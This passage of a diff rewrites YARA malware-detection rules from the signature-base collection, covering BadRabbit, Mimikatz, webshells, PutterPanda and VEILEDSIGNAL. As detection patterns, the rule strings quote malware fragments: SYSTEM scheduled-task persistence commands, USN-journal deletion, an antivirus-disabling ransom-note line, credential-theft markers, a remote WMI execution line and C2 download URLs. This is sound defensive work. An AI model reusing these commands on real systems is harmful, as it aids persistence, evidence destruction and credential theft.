-		hash0 = "0af4360a5ae54d789a8814bf7791d5c77136d625"
-		hash1 = "777bf8def279942a25750feffc11d8a36cc0acf9"
-		hash2 = "173f20b126cb57fc8ab04d01ae223071e2345f97"
+		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
+		hash2 = "579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648"
+		hash3 = "630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da"
 
 	strings:
-		$x1 = "\\MiniAsp4\\Release\\MiniAsp.pdb" ascii
-		$x2 = "run http://%s/logo.png setup.exe" fullword ascii
-		$x3 = "d:\\command.txt" fullword ascii
-		$z1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR " ascii
-		$z2 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)" fullword ascii
-		$z3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC" ascii
-		$s1 = "http://%s/device_command.asp?device_id=%s&cv=%s&command=%s" fullword ascii
-		$s2 = "kill process error!" fullword ascii
-		$s3 = "kill process success!" fullword ascii
-		$s4 = "pickup command error!" fullword ascii
-		$s5 = "http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s" fullword ascii
-		$s6 = "no command" fullword ascii
-		$s7 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
-		$s8 = "command is null!" fullword ascii
-		$s9 = "pickup command Ok!" fullword ascii
-		$s10 = "http://%s/result_%s.htm" fullword ascii
+		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST" fullword wide
+		$x2 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\"" fullword wide
+		$x3 = "C:\\Windows\\infpub.dat" fullword wide
+		$x4 = "C:\\Windows\\cscc.dat" fullword wide
+		$s1 = "need to do is submit the payment and get the decryption password." fullword ascii
+		$s2 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
+		$s3 = "\\\\.\\pipe\\%ws" fullword wide
+		$s4 = "fsutil usn deletejournal /D %c:" fullword wide
+		$s5 = "Run DECRYPT app at your desktop after system boot" fullword ascii
+		$s6 = "Files decryption completed" fullword wide
+		$s7 = "Disable your anti-virus and anti-malware programs" fullword wide
+		$s8 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
+		$s9 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$s10 = "%ws C:\\Windows\\%ws,#1 %ws" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) or ( all of ( $z* ) ) or ( 8 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_VULN_Dell_BIOS_Update_Driver_Dbutil_May21 : CVE_2021_21551 FILE
+rule SIGNATURE_BASE_Badrabbit_Mimikatz_Comp : FILE
 {
 	meta:
-		description = "Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it's usual location is in the C:\\Windows\\Temp folder"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d46866e-40fb-5fbf-b159-6bf688e638cb"
-		date = "2021-05-05"
+		id = "52affd3f-6bf9-55f6-92a5-69314a2e76e0"
+		date = "2017-10-25"
 		modified = "2023-12-05"
-		reference = "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_dell_bios_upd_driver.yar#L2-L18"
+		reference = "https://pastebin.com/Y7pJv3tK"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_badrabbit.yar#L42-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9cefb9fe28e818a3b0bc1c9ac570ddf2fac7ebf23408963656b7ec86d5bf3224"
-		score = 60
+		logic_hash = "9d12d9331686a54e8d32f94761e4889710bbd2432d4cb2e4e7e3f21ef6aa082a"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-21551, FILE"
-		hash1 = "0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5"
-		hash2 = "ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035"
 
 	strings:
-		$s1 = "\\DBUtilDrv2" ascii
-		$s2 = "DBUtil_2_3.Sys" ascii fullword
-		$s3 = "[ Dell BIOS Utility Driver - " ascii fullword
+		$s1 = "%lS%lS%lS:%lS" fullword wide
+		$s2 = "lsasrv" fullword wide
+		$s3 = "CredentialKeys" ascii
+		$s4 = { 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them )
 }
-
-rule SIGNATURE_BASE_Gen_Excel_Xll_Addin_Suspicious : FILE
+rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_2 : FILE
 {
 	meta:
-		description = "Detects suspicious XLL add-ins to Excel"
-		author = "@JohnLaTwC"
-		id = "013db759-ab9d-5505-933b-bda702a0941e"
-		date = "2020-10-16"
+		description = "Detection for the z_webshell"
+		author = "DHS NCCIC Hunt and Incident Response Team"
+		id = "9a54925f-de10-567f-a1ea-5e7522b47dfd"
+		date = "2018-01-25"
 		modified = "2023-12-05"
-		reference = "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_excel_xll_addin_suspicious.yar#L3-L64"
+		old_rule_name = "z_webshell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_074A.yar#L9-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8c3f00ef05b0b84e4c4d655d01eab6f6e67714619695fd1433726e5a940e530"
-		score = 65
-		quality = 85
+		hash = "2c9095c965a55efc46e16b86f9b7d6c6"
+		logic_hash = "d41aa107e54af5d45531a46d24b24f9f14635dbcb50ed26f7c787883854f961f"
+		score = 75
+		quality = 81
 		tags = "FILE"
-		hash1 = "0bad4e4bc5093dcfc2737c4d8be89d6f093509a7b91a1e022050cb890d90e4e0"
-		hash2 = "133e47eedfede46d1a4529ce7f047e09521ed8c7cad2e49d3522064695bd6c43"
-		hash3 = "1994a39d5639b4eea5c3cdf084a8eacf8610a96702e580d88a6ec18887d0ec6b"
-		hash4 = "28f45d01e397841fcba48da1e61e4927f42ff6fe6f32595c23cf9a953cd2658a"
-		hash5 = "54c3598cf22ad64faeb4e0f9f70e026a1ae834a8c06e5187bf289bb3ee43a8ec"
-		hash6 = "5644a04513744edfb247d0ea83e3e2f7d616d6752cfd1af50e866bb0270131ee"
-		hash7 = "836c0d21fc3ea3a8ce1a493097a5034d110e5c50bfd7e6c3dcb674dc7a6a19ec"
-		hash8 = "b926f7db36bc5bae73091c783b0715d2af051de22a579548adf2498cb1a1d075"
-		hash9 = "6ba100a5da5efea14a5ca929628b732a6e6b8ab8f78167db35343e895997ce52"
-		hasha = "ee603cbd6187850334ae5d8adcf029d5cde710fc966b2b7a2c95249d3b23d693"
-		hashb = "99195679e998407fd4d606a0d956bda99f79625b638c63f90d9d399c6f2a143e"
-		hashc = "99534c7086128998ae39967fe5fc6bf526cb2ba5d3b2e99dc7bd03833e4a94ae"
 
 	strings:
-		$s1 = "CryptStringToBinaryA"
-		$s2 = "NtQueueApcThread"
-		$cs1 = "dsrole.dll"
-		$cs2 = "user32.dll"
-		$debug = "SeDebugPrivilege"
+		$webshell_name = "public string z_progname =" nocase ascii wide
+		$webshell_password = "public string Password =" nocase ascii wide
 
 	condition:
-		filesize < 1MB and uint16( 0 ) == 0x5a4d and pe.characteristics & pe.DLL and pe.exports ( "xlAutoOpen" ) and ( ( ( pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueW" ) or pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueA" ) ) and pe.imports ( "KERNEL32.dll" , "AdjustTokenPrivileges" ) and pe.imports ( "KERNEL32.dll" , "OpenProcess" ) and $debug ) or ( pe.imports ( "ADVAPI32.dll" , "CryptDecrypt" ) and pe.imports ( "ADVAPI32.dll" , "CryptImportKey" ) ) or ( pe.imports ( "DNSAPI.dll" , "DnsQuery_A" ) or pe.imports ( "DNSAPI.dll" , "DnsQuery_W" ) ) or ( ( pe.imports ( "KERNEL32.dll" , "FindResourceA" ) or pe.imports ( "KERNEL32.dll" , "FindResourceW" ) ) and pe.imports ( "KERNEL32.dll" , "LoadResource" ) and pe.imports ( "KERNEL32.dll" , "LockResource" ) and ( pe.imports ( "KERNEL32.dll" , "VirtualAlloc" ) or pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) ) and pe.imports ( "KERNEL32.dll" , "WriteProcessMemory" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "GetThreadContext" ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "ResumeThread" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "WinExec" ) ) or ( all of ( $s* ) ) or ( all of ( $cs* ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "TerminateProcess" ) and pe.imports ( "KERNEL32.dll" , "Sleep" ) ) )
+		( uint32( 0 ) == 0x2040253c or uint32( 0 ) == 0x7073613c ) and filesize < 100KB and 2 of ( $webshell_* )
 }
-rule SIGNATURE_BASE_Invoke_Osiris : FILE
+rule SIGNATURE_BASE_TA18_074A_Screen : FILE
 {
 	meta:
-		description = "Osiris Device Guard Bypass - file Invoke-OSiRis.ps1"
-		author = "Florian Roth"
-		id = "ee1a7e10-ffca-58d2-b01f-7444468ceb3c"
-		date = "2017-03-27"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps_osiris.yar#L10-L26"
+		description = "Detects malware mentioned in TA18-074A"
+		author = "Florian Roth (Nextron Systems)"
+		id = "789ee5e5-83c3-5137-a078-ff230dbf8fcd"
+		date = "2018-03-16"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_074A.yar#L34-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a93308d6595de647a96716df0799ec690d91b2fb87e0b4a2f47e6b8b52eed97"
-		score = 70
+		logic_hash = "e96f70e3d9c7ff5812724111788365c47e2b478a35b39771c12a3d3636a6a020"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "19e4a8b07f85c3d4c396d0c4e839495c9fba9405c06a631d57af588032d2416e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$x1 = "$null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target" ascii wide
-		$x3 = "-Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}" ascii wide
-		$x4 = "Device Guard Bypass Command Execution" ascii wide
+		$s1 = "screen.exe" fullword wide
+		$s2 = "PlatformInvokeUSER32" fullword ascii
+		$s3 = "GetDesktopImageF" fullword ascii
+		$s4 = "PlatformInvokeGDI32" fullword ascii
+		$s5 = "Too many arguments, going to store in current dir" fullword wide
 
 	condition:
-		filesize < 8MB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23 : FILE
+rule SIGNATURE_BASE_TA18_074A_Scripts : FILE
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "74c403ea-3178-58e8-88b3-a51c1d475868"
-		date = "2023-04-20"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L2-L17"
+		description = "Detects malware mentioned in TA18-074A"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4c786098-c5f4-529b-8732-03183dfa94b5"
+		date = "2018-03-16"
+		modified = "2022-08-18"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta18_074A.yar#L53-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4fe1a1b09344cd84f981b193b480d23807893b59ad781868d82089a7306c042f"
-		score = 85
+		logic_hash = "888ddd59b388033604474fc008f830159a9a104683fb052e7497b83118cbb8aa"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$op1 = {B8 AB AA AA AA F7 E1 8B C1 C1 EA 02 8D 14 52 03 D2 2B C2 8A 84 05 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ??}
-		$op2 = { 50 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 3C 00 00 00 C7 85 ?? ?? ?? ?? 40 00 00 00 C7 85 ?? ?? ?? ?? 05 00 00 00 FF 15}
-		$op3 = { 6A 00 8D 85 ?? ?? ?? ?? 50 6A 04 8D 85 ?? ?? ?? ?? 50 57 FF 15 }
+		$s1 = "Running -s cmd /c query user on " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel : FILE
 {
 	meta:
-		description = "Detects marker found in VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "8f0d92b6-d9b0-55e3-b2ca-601d095f5279"
-		date = "2023-04-20"
-		modified = "2023-04-21"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L19-L35"
+		description = "Detects an APT malware related to PutterPanda"
+		author = "Florian Roth (Nextron Systems)"
+		id = "980922cb-edfb-50ab-a102-a8168aa2b0e0"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ccb482a7634dc24fde03b5730bf28a9e028f8d5a9ad46ba9663d1b520264d8f4"
-		score = 75
+		hash = "5367e183df155e3133d916f7080ef973f7741d34"
+		logic_hash = "f2ffab73993c578f47e17babc2e65301b3720e438b33e57f2af31b7183bfd20f"
+		score = 70
 		quality = 85
-		tags = ""
-		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$opb1 = { 81 BD ?? ?? ?? ?? 5E DA F3 76}
-		$opb2 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA 66 C7 85 ?? ?? ?? ?? E5 CF}
-		$opb3 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA B9 00 04 00 00 66 C7 85 ?? ?? ?? ?? E5 CF }
+		$x0 = "app.stream-media.net" fullword ascii
+		$x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii
+		$s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii
+		$s7 = "Connect %s error!" fullword ascii
+		$s9 = "Download file %s successfully!" fullword ascii
+		$s10 = "index.tmp" fullword ascii
+		$s11 = "Execute PE Successfully" fullword ascii
+		$s13 = "aa/22/success.xml" fullword ascii
+		$s16 = "aa/22/index.asp" fullword ascii
+		$s18 = "File %s a Non-Pe File" fullword ascii
+		$s19 = "SendRequset error!" fullword ascii
+		$s20 = "filelist[%d]=%s" fullword ascii
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_1 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel_2 : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "3e7c92fe-a7bd-5180-9935-4f98f2b64e2b"
-		date = "2023-04-20"
+		description = "APT Malware related to PutterPanda Group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3eef8869-45d6-57a4-a182-c5349b034cf4"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L37-L55"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L30-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "439a201e6a44a00a31fd13efc83a1acf858a52201e3ab48d5cf095bae1e48cf7"
-		score = 75
+		hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381"
+		logic_hash = "60a48288cb106135728fb676ecad2b9be5254d5dc5094da158ea9dc07704c9ab"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "404b09def6054a281b41d309d809a428"
-		hash2 = "c6441c961dcad0fe127514a918eaabd4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$rh1 = { 68 5D 7A D2 2C 3C 14 81 2C 3C 14 81 2C 3C 14 81 77 54 10 80 26 3C 14 81 77 54 17 80 29 3C 14 81 77 54 11 80 AB 3C 14 81 D4 4C 11 80 33 3C 14 81 D4 4C 10 80 22 3C 14 81 D4 4C 17 80 25 3C 14 81 77 54 15 80 27 3C 14 81 2C 3C 15 81 4B 3C 14 81 94 4D 1D 80 28 3C 14 81 94 4D 14 80 2D 3C 14 81 94 4D 16 80 2D 3C 14 81 }
-		$rh2 = { 00 E5 A0 2B 44 84 CE 78 44 84 CE 78 44 84 CE 78 1F EC CA 79 49 84 CE 78 1F EC CD 79 41 84 CE 78 1F EC CB 79 C8 84 CE 78 BC F4 CA 79 4A 84 CE 78 BC F4 CD 79 4D 84 CE 78 BC F4 CB 79 65 84 CE 78 1F EC CF 79 43 84 CE 78 44 84 CF 78 22 84 CE 78 FC F5 C7 79 42 84 CE 78 FC F5 CE 79 45 84 CE 78 FC F5 CC 79 45 84 CE 78}
-		$rh3 = { DA D2 21 22 9E B3 4F 71 9E B3 4F 71 9E B3 4F 71 C5 DB 4C 70 94 B3 4F 71 C5 DB 4A 70 15 B3 4F 71 C5 DB 4B 70 8C B3 4F 71 66 C3 4B 70 8C B3 4F 71 66 C3 4C 70 8F B3 4F 71 C5 DB 49 70 9F B3 4F 71 66 C3 4A 70 B0 B3 4F 71 C5 DB 4E 70 97 B3 4F 71 9E B3 4E 71 F9 B3 4F 71 26 C2 46 70 9F B3 4F 71 26 C2 B0 71 9F B3 4F 71 9E B3 D8 71 9F B3 4F 71 26 C2 4D 70 9F B3 4F 71 }
-		$rh4 = { CB 8A 35 66 8F EB 5B 35 8F EB 5B 35 8F EB 5B 35 D4 83 5F 34 85 EB 5B 35 D4 83 58 34 8A EB 5B 35 D4 83 5E 34 09 EB 5B 35 77 9B 5E 34 92 EB 5B 35 77 9B 5F 34 81 EB 5B 35 77 9B 58 34 86 EB 5B 35 D4 83 5A 34 8C EB 5B 35 8F EB 5A 35 D3 EB 5B 35 37 9A 52 34 8C EB 5B 35 37 9A 58 34 8E EB 5B 35 37 9A 5B 34 8E EB 5B 35 37 9A 59 34 8E EB 5B 35 }
+		$s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii
+		$s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" fullword ascii
+		$s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
+		$s3 = "Internet connect error:%d" fullword ascii
+		$s4 = "Proxy-Authorization:Basic" fullword ascii
+		$s5 = "HttpQueryInfo failed:%d" fullword ascii
+		$s6 = "read file error:%d" fullword ascii
+		$s7 = "downdll.dll" fullword ascii
+		$s8 = "rz.dat" fullword ascii
+		$s9 = "Invalid url" fullword ascii
+		$s10 = "Create file failed" fullword ascii
+		$s11 = "myAgent" fullword ascii
+		$s12 = "%s%s%d%d" fullword ascii
+		$s13 = "down file success" fullword ascii
+		$s15 = "error!" fullword ascii
+		$s18 = "Avaliable data:%u bytes" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $rh* )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_2 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_PSAPI : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "1b96c2f0-1c57-593e-9630-a72d43eb857e"
-		date = "2023-04-20"
+		description = "Detects a malware related to Putter Panda"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e074ab8a-2ca4-579e-aaef-cdfb9c64b21b"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L57-L76"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L61-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "62f74faa8f136f4dc63a4b703cffcb97b438cc4f180d5d127d1fc4b86d3cd1d1"
-		score = 75
+		hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5"
+		logic_hash = "b73f1db2ca8a3164562314ebd9903c864eb2690c95731959df0e99656544ed40"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "404b09def6054a281b41d309d809a428"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sb1 = { C1 E0 05 4D 8? [2] 33 D0 45 69 C0 7D 50 BF 12 8B C2 41 FF C2 C1 E8 07 33 D0 8B C2 C1 E0 16 41 81 C0 87 D6 12 00 }
-		$si1 = "CryptBinaryToStringA" fullword
-		$si2 = "BCryptGenerateSymmetricKey" fullword
-		$si3 = "CreateThread" fullword
-		$ss1 = "ChainingModeGCM" wide
-		$ss2 = "__tutma" fullword
+		$s0 = "LOADER ERROR" fullword ascii
+		$s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s2 = "psapi.dll" fullword ascii
+		$s3 = "urlmon.dll" fullword ascii
+		$s4 = "WinHttpGetProxyForUrl" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_3 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_WUAUCLT
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "82790c65-1d93-509b-95df-841543943c30"
-		date = "2023-04-20"
+		description = "Detects a malware related to Putter Panda"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5c8e0629-b5f2-5933-8c74-c49b756aaf18"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L78-L96"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L81-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c6441c961dcad0fe127514a918eaabd4"
-		logic_hash = "2109340edfb1891baef5bd92ba3c9da77f891341de9e8094060a649de62fade2"
-		score = 75
+		hash = "fd5ca5a2d444865fa8320337467313e4026b9f78"
+		logic_hash = "49cae3b727d6b2673dc9a6497d59c9abdd78d486e1eaf6f036f6eb1aef9a8fcb"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ss1 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6A 73 6F 6E 2C 20 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 2C 20 2A 2F 2A 3B 20 71 3D 30 2E 30 31 00 00 61 63 63 65 70 74 00 00 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 39 00 00 61 63 63 65 70 74 2D 6C 61 6E 67 75 61 67 65 00 63 6F 6F 6B 69 65 00 00 }
-		$si1 = "HttpSendRequestW" fullword
-		$si2 = "CreateNamedPipeW" fullword
-		$si3 = "CreateThread" fullword
-		$se1 = "DllGetClassObject" fullword
+		$x0 = "WUAUCLT.EXE" fullword wide
+		$x1 = "%s\\tmp%d.exe" fullword ascii
+		$x2 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s1 = "Microsoft Windows Operating System" fullword wide
+		$s2 = "InternetQueryOptionA" fullword ascii
+		$s3 = "LookupPrivilegeValueA" fullword ascii
+		$s4 = "WNetEnumResourceA" fullword ascii
+		$s5 = "HttpSendRequestExA" fullword ascii
+		$s6 = "PSAPI.DLL" fullword ascii
+		$s7 = "Microsoft(R) Windows(R) Operating System" fullword wide
+		$s8 = "CreatePipe" fullword ascii
+		$s9 = "EnumProcessModules" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		all of ( $x* ) or ( 1 of ( $x* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_4 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen1 : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "379e6471-3c4f-5c72-b8fd-17f481e89ac6"
-		date = "2023-04-20"
+		description = "Detects a malware "
+		author = "YarGen Rule Generator"
+		id = "5e7910e7-3f33-50fb-a87f-bf0bbf8a2797"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
